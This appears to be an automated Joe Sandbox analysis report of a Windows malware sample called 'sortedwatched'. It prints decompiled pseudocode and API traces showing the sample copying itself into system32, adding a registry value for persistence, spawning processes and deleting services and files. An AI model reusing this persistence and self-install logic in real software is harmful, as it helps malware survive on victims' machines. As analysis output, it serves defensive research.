                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F9DF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62registryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0040F9DF() {
				void* _v8;
				char _v528;
				void* _t8;
				void* _t12;
				void* _t20;
				void* _t30;
				signed int _t31;
				void* _t33;

				if( *0x415f4c == 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					_t31 =  *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t30, _t33, _t20);
					_t12 = L00401B09(_t34);
					if(_t31 > 0) {
						_t36 = E00401A52(0x412be0, 0x4bf67e71);
						if(RegCreateKeyExW(0x80000001, _t13, 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
							RegSetValueExW(_v8, "sortedwatched", 0, 1,  &_v528, 2 + _t31 * 2);
							RegCloseKey(_v8);
						}
						_t12 = L00401B09(_t36);
					}
					return _t12;
				}
				return _t8;
			}











                  0x0040f9ef
                  0x0040fa09
                  0x0040fa28
                  0x0040fa2a
                  0x0040fa31
                  0x0040fa41
                  0x0040fa5c
                  0x0040fa78
                  0x0040fa81
                  0x0040fa81
                  0x0040fa89
                  0x0040fa89
                  0x00000000
                  0x0040fa90
                  0x0040fa94

                  APIs
                  • _snwprintf.NTDLL ref: 0040FA1D
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,0040C715,00000000), ref: 0040FA54
                  • RegSetValueExW.ADVAPI32(0040C715,sortedwatched,00000000,00000001,?,00000000), ref: 0040FA78
                  • RegCloseKey.ADVAPI32(0040C715), ref: 0040FA81
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 1044119080-1568575355
                  • Opcode ID: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction ID: ae6d8057d6044da2fd1c6008afec86d0aa78eac3dd708c417e1b6433d3ba4775
                  • Opcode Fuzzy Hash: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction Fuzzy Hash: D211CC71700208BFD710AB959D85FEB776DDB44785F10407BF909E3191EB749D448AA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FB72, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				void* _v20;
				void* _v24;
				char _v544;
				char _v1064;
				void* _t16;
				void* _t39;

				_v8 = _v8 & 0x00000000;
				E0040FAA1( &_v544);
				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
				if(_t16 != 0) {
					_t16 = E00401DCB( &_v8);
					if(_t16 != 0) {
						_t39 = E00401A52(0x412e50, 0x55009ce0);
						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
						_t33 = _t39;
						L00401B09(_t39);
						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
							CloseHandle(_v24);
							CloseHandle(_v20);
						}
						return CloseHandle(_v8);
					}
				}
				return _t16;
			}










                  0x0040fb7b
                  0x0040fb88
                  0x0040fb98
                  0x0040fba0
                  0x0040fba5
                  0x0040fbac
                  0x0040fbbd
                  0x0040fbd3
                  0x0040fbdc
                  0x0040fbde
                  0x0040fbfb
                  0x0040fc00
                  0x0040fc09
                  0x0040fc09
                  0x00000000
                  0x0040fc12
                  0x0040fbac
                  0x0040fc1c

                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 1860464474-3103284439
                  • Opcode ID: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction ID: aef8b5b249e02084cc47ae1663e45d8d954b77272b63b26d03dd396773520d47
                  • Opcode Fuzzy Hash: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction Fuzzy Hash: BA11867290011D9BDF21EB60DD05AEEB378EF44305F1044BAE905B21E1EB749F54CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F63A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				short _v524;
				WCHAR* _t34;

				_t34 = 0;
				E00401000();
				if(E0040108B(0x416c50, 0x416840) == 0) {
					E00401503( &_v524, 0x104);
					GetTempPathW(0x104,  &_v524);
					GetTempFileNameW( &_v524, 0, 0,  &_v524);
					if(E0040108B(0x416840,  &_v524) != 0) {
						_t34 = E0040108B(0x416c50, 0x416840);
						_t38 = _t34;
						if(_t34 == 0) {
							E0040108B( &_v524, 0x416840);
						}
					}
				}
				E004010DC(_t38);
				return _t34;
			}





                  0x0040f645
                  0x0040f647
                  0x0040f65f
                  0x0040f66f
                  0x0040f67c
                  0x0040f68c
                  0x0040f6a2
                  0x0040f6b0
                  0x0040f6b2
                  0x0040f6b4
                  0x0040f6be
                  0x0040f6be
                  0x0040f6b4
                  0x0040f6a2
                  0x0040f6c3
                  0x0040f6cf

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 9715921-2032501620
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401CC2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50processUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				void* _t22;

				_t22 = 0x44;
				E00401503( &_v88, _t22);
				_v88.cb = 0x44;
				if(CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 == 0) {
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}






                  0x00401cd0
                  0x00401cd4
                  0x00401cdc
                  0x00401cfa
                  0x00000000
                  0x00401d23
                  0x00401d01
                  0x00401d12
                  0x00401d1b
                  0x00401d03
                  0x00401d06
                  0x00401d07
                  0x00401d08
                  0x00401d09
                  0x00401d09
                  0x00000000

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F292, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 29UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F292() {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t15;
				void* _t18;
				void* _t19;

				if( *0x415f4c == 0) {
					E0040F227();
				} else {
					E0040F214();
				}
				E00401503(0x416840, 0x104);
				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
				_t19 = _t3;
				 *0x4143a4(0x416840, 0x104, _t19, "C:\Windows\system32", "sortedwatched", _t15, _t18, _t7);
				_t10 = _t19;
				return HeapFree(GetProcessHeap(), 0, _t10);
			}









                  0x0040f299
                  0x0040f2a2
                  0x0040f29b
                  0x0040f29b
                  0x0040f29b
                  0x0040f2b8
                  0x0040f2c7
                  0x0040f2d6
                  0x0040f2db
                  0x0040f2e4
                  0x00401542

                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 3078599568-3932404036
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F227, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0040F227() {
				void* _t3;
				void* _t8;
				void* _t10;
				void* _t13;
				void* _t14;

				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
				_t3 = E00401A52(0x412df0, 0x4bf67e71);
				_t14 = _t3;
				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, "sortedwatched");
				_t8 = _t14;
				return HeapFree(GetProcessHeap(), 0, _t8);
			}








                  0x0040f236
                  0x0040f246
                  0x0040f251
                  0x0040f25a
                  0x0040f263
                  0x00401542

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\system32), ref: 0040F236
                  • _snwprintf.NTDLL ref: 0040F25A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$g8Cw$sortedwatched
                  • API String ID: 3078599568-1150327775
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F6D0, Relevance: 7.6, APIs: 5, Instructions: 74servicestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F6D0(void* __ecx) {
				short _v524;
				signed short* _t12;
				void* _t15;
				void* _t19;
				signed short _t21;
				short* _t24;
				signed int _t25;
				void* _t26;
				short* _t27;
				void* _t28;

				_t27 = 0;
				_t19 = __ecx;
				_t26 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_t21 = _v524;
				_t12 =  &_v524;
				if(_t21 != 0) {
					_t25 = _t21 & 0x0000ffff;
					do {
						if(_t25 == 0x5c) {
							_t27 =  &(_t12[1]);
						}
						_t12 =  &(_t12[1]);
						_t25 =  *_t12 & 0x0000ffff;
					} while (_t25 != 0);
				}
				_t15 =  &(( &_v524)[lstrlenW( &_v524)]);
				while(_t15 >=  &_v524) {
					if( *_t15 == 0x2e) {
						_t26 = _t15;
					} else {
						_t15 = _t15 - 2;
						continue;
					}
					L11:
					if(_t27 != 0) {
						if(_t26 != 0) {
							 *_t26 = 0;
						}
						_t15 =  *_t27 & 0x0000ffff;
						_t24 = _t27;
						while(_t15 != 0) {
							if(_t15 >= 0x30 && _t15 <= 0x39) {
								_t24 =  &(_t24[1]);
								_t15 =  *_t24 & 0x0000ffff;
								continue;
							}
							goto L21;
						}
						_t15 = OpenServiceW(_t19, _t27, 0x10000);
						_t28 = _t15;
						if(_t28 != 0) {
							DeleteService(_t28);
							return CloseServiceHandle(_t28);
						}
					}
					L21:
					return _t15;
				}
				goto L11;
			}













                  0x0040f6e7
                  0x0040f6eb
                  0x0040f6ed
                  0x0040f6ef
                  0x0040f6f5
                  0x0040f6fc
                  0x0040f705
                  0x0040f707
                  0x0040f70a
                  0x0040f70e
                  0x0040f710
                  0x0040f710
                  0x0040f713
                  0x0040f716
                  0x0040f719
                  0x0040f70a
                  0x0040f731
                  0x0040f73f
                  0x0040f73a
                  0x0040f74b
                  0x0040f73c
                  0x0040f73c
                  0x00000000
                  0x0040f73c
                  0x0040f74d
                  0x0040f74f
                  0x0040f753
                  0x0040f757
                  0x0040f757
                  0x0040f75a
                  0x0040f75d
                  0x0040f773
                  0x0040f765
                  0x0040f76d
                  0x0040f770
                  0x00000000
                  0x0040f770
                  0x00000000
                  0x0040f765
                  0x0040f77f
                  0x0040f785
                  0x0040f789
                  0x0040f78c
                  0x00000000
                  0x0040f793
                  0x0040f789
                  0x0040f79f
                  0x0040f79f
                  0x0040f79f
                  0x00000000

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0040F6EF
                  • lstrlenW.KERNEL32(?), ref: 0040F725
                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 0040F77F
                  • DeleteService.ADVAPI32(00000000), ref: 0040F78C
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F793
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction ID: 98483c91935e4ebaa86b3809d2fb255be3bc53819a93f085276952b5965563ee
                  • Opcode Fuzzy Hash: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction Fuzzy Hash: F4212B754012259ACB309F248C48AF77778DF44B56F40017BE985F7A90EB389E8AC79E
                  Uniqueness

                  Uniqueness Score: 1.01%

                  Function 0040F63A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				short _v524;
				WCHAR* _t34;

				_t34 = 0;
				E00401000();
				if(E0040108B(0x416c50, 0x416840) == 0) {
					E00401503( &_v524, 0x104);
					GetTempPathW(0x104,  &_v524);
					GetTempFileNameW( &_v524, 0, 0,  &_v524);
					if(E0040108B(0x416840,  &_v524) != 0) {
						_t34 = E0040108B(0x416c50, 0x416840);
						_t38 = _t34;
						if(_t34 == 0) {
							E0040108B( &_v524, 0x416840);
						}
					}
				}
				E004010DC(_t38);
				return _t34;
			}





                  0x0040f645
                  0x0040f647
                  0x0040f65f
                  0x0040f66f
                  0x0040f67c
                  0x0040f68c
                  0x0040f6a2
                  0x0040f6b0
                  0x0040f6b2
                  0x0040f6b4
                  0x0040f6be
                  0x0040f6be
                  0x0040f6b4
                  0x0040f6a2
                  0x0040f6c3
                  0x0040f6cf

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 130228747-3820085027
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401000() {
				short _v524;
				signed int _t14;
				signed char _t16;
				struct _SECURITY_ATTRIBUTES* _t24;
				void* _t25;

				E00401503( &_v524, 0x208);
				if( *0x416840 == 0) {
					L9:
					return 1;
				}
				_t24 = 0;
				do {
					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
					_t24 =  &(_t24->nLength);
					 *(_t25 + _t24 - 0x20a) = _t14;
					if(_t14 != 0x5c) {
						goto L8;
					}
					_t16 = GetFileAttributesW( &_v524);
					if(_t16 != 0xffffffff) {
						if((_t16 & 0x00000010) == 0) {
							L6:
							return 0;
						}
						goto L8;
					}
					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
						goto L6;
					}
					L8:
				} while ( *(_t24 + 0x416840) != 0);
				goto L9;
			}








                  0x00401016
                  0x00401023
                  0x00401082
                  0x00000000
                  0x00401084
                  0x00401027
                  0x00401029
                  0x00401029
                  0x00401030
                  0x00401033
                  0x0040103e
                  0x00000000
                  0x00000000
                  0x00401047
                  0x00401050
                  0x00401077
                  0x00401071
                  0x00000000
                  0x00401071
                  0x00000000
                  0x00401077
                  0x00401062
                  0x00000000
                  0x00000000
                  0x00401079
                  0x00401079
                  0x00000000

                  APIs
                  • GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 674977465-2966989349
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F883, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F883(WCHAR* __ecx) {
				short _t21;
				short _t24;
				short _t25;
				WCHAR* _t27;
				short _t30;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				void* _t37;

				_t27 = __ecx;
				lstrcpyW(__ecx, "C:\Windows\system32");
				_t32 = lstrlenW(_t27);
				_t21 = 0x5c;
				_t27[_t32] = _t21;
				_t33 = _t32 + 1;
				_t37 = (GetTickCount() & 0x0000000f) + 4;
				E00401E8F( &(_t27[_t33]), _t37);
				_t24 = 0x2e;
				_t34 = _t33 + _t37;
				_t30 = 0x65;
				_t27[_t34] = _t24;
				_t25 = 0x78;
				 *((short*)(_t27 + 2 + _t34 * 2)) = _t30;
				 *((short*)(_t27 + 4 + _t34 * 2)) = _t25;
				 *((short*)(_t27 + 6 + _t34 * 2)) = _t30;
				 *((short*)(_t27 + 8 + _t34 * 2)) = 0;
				return 0;
			}












                  0x0040f886
                  0x0040f88e
                  0x0040f89b
                  0x0040f89f
                  0x0040f8a0
                  0x0040f8a4
                  0x0040f8b3
                  0x0040f8b8
                  0x0040f8bf
                  0x0040f8c0
                  0x0040f8c4
                  0x0040f8c7
                  0x0040f8cb
                  0x0040f8cc
                  0x0040f8d1
                  0x0040f8d8
                  0x0040f8dd
                  0x0040f8e5

                  APIs
                  • lstrcpyW.KERNEL32(?,C:\Windows\system32), ref: 0040F88E
                  • lstrlenW.KERNEL32(?), ref: 0040F895
                  • GetTickCount.KERNEL32 ref: 0040F8A5
                    • Part of subcall function 00401E8F: GetTickCount.KERNEL32(00000001,-00000004,?), ref: 00401EA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\system32
                  • API String ID: 1913473829-2896066436
                  • Opcode ID: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction ID: fa4d6f9086d2f062a8c468281c34a08385031fd9eafdca72e636224e2a785f14
                  • Opcode Fuzzy Hash: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction Fuzzy Hash: C9F0F6236583056BD7205FE0EC89A563725DF44762F15D0B6EC09EF6A6EB74C841C3A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004010DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
				short _v524;

				_t12 = E00401A52(0x412000, 0x7b38aa91);
				 *0x4143a4( &_v524, 0x104, _t3, "C:\Windows\system32\sortedwatched.exe");
				L00401B09(_t12);
				return DeleteFileW( &_v524);
			}




                  0x004010f5
                  0x00401109
                  0x00401114
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw
                  • API String ID: 366827715-662138423
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040284F, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 176UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t89;
				void* _t90;
				signed int _t92;
				signed int _t93;
				signed int _t101;
				signed int _t126;
				int* _t128;
				char _t133;
				signed int _t135;
				signed int _t136;
				void* _t137;
				intOrPtr _t139;
				signed int _t141;
				void* _t142;
				signed int _t145;
				intOrPtr* _t148;
				signed int _t152;
				int _t153;
				intOrPtr _t154;
				int _t155;
				void* _t156;

				_t148 = __ecx;
				_t142 = 8;
				if(__ecx == 0) {
					L22:
					_push(0xfffffffe);
					L23:
					_pop(_t89);
					return _t89;
				}
				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
				if(_t128 == 0) {
					goto L22;
				}
				_t90 = 9;
				_t143 =  >  ? _t90 : _t142;
				_v20 =  *((intOrPtr*)(__ecx + 4));
				_t92 =  *(_t128 + 0x2af8);
				_v24 =  >  ? _t90 : _t142;
				 *(_t128 + 0x2af8) = 0;
				if( *(_t128 + 0xab04) >= 0) {
					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
					__eflags = _t92;
					if(_t92 == 0) {
						_t93 =  *(_t128 + 0x2af4);
						__eflags = _t93;
						if(_t93 == 0) {
							while(1) {
								_t131 =  *(_t128 + 0x2af0);
								_v8 =  *((intOrPtr*)(_t148 + 4));
